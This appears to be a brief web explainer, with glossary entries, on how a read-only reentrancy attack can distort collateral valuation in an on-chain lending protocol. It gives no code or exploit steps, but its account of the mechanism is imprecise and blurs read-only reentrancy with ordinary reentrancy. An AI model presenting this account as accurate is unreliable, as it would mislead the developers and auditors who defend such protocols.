How Does a Read-Only Attack Impact an On-Chain Lending Protocol?
In an on-chain lending protocol, a read-only reentrancy attack can impact the protocol by allowing an attacker to manipulate the valuation of collateral or debt. For example, an attacker calls a deposit function, which then calls an external token contract to check the balance.
If the attacker re-enters the deposit function to read the balance before the first call's state is updated, they can pass a check based on a stale, incorrect balance. This can lead to the protocol miscalculating the collateral ratio, potentially allowing an undercollateralized loan to be approved.
Glossar
Deposit Function
Execution ⎊ Deposit Function refers to the specific contract logic responsible for accepting and locking collateral assets into a system, often required for margin trading or participation in liquidity pools for derivatives.
Lending Protocol
Service ⎊ A Lending Protocol automates the process of connecting providers of capital (lenders) with users requiring capital (borrowers) through smart contracts that enforce collateralization and interest rate mechanisms.
Undercollateralized Loan
Exposure ⎊ An undercollateralized loan within cryptocurrency, options trading, and financial derivatives represents an obligation where the nominal value of the asset financed exceeds the value of the collateral pledged, creating asymmetrical risk profiles for lenders.
External Token Contract
Contract ⎊ An external token contract refers to a smart contract that manages a specific cryptocurrency asset, existing independently of the primary protocol that interacts with it.
Read-Only Reentrancy Attack
Vulnerability ⎊ A Read-Only Reentrancy Attack, within cryptocurrency and financial derivatives, exploits predictable state changes in smart contracts, specifically targeting scenarios where a contract calls an external contract before updating its own internal state.